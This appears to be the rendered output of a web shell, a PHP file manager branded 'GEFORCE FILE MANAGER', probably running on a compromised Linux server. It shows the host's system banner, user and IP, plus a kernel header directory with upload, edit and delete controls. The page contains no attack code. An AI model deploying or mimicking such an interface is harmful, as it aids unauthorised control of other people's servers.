[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.20
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
linux
/
bcma
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 bcma.h
15,546 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_driver_arm_c9.h
662 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_driver_chipcommon.h
32,579 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_driver_gmac_cmn.h
3,689 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_driver_mips.h
1,467 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_driver_pci.h
13,658 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_driver_pcie2.h
6,929 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_regs.h
5,176 B
SET
[ EDIT ]
|
[ DEL ]
📄 bcma_soc.h
354 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: bcma_soc.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef LINUX_BCMA_SOC_H_ #define LINUX_BCMA_SOC_H_ #include <linux/bcma/bcma.h> struct bcma_soc { struct bcma_bus bus; }; int __init bcma_host_soc_register(struct bcma_soc *soc); int __init bcma_host_soc_init(struct bcma_soc *soc); int bcma_bus_register(struct bcma_bus *bus); #endif /* LINUX_BCMA_SOC_H_ */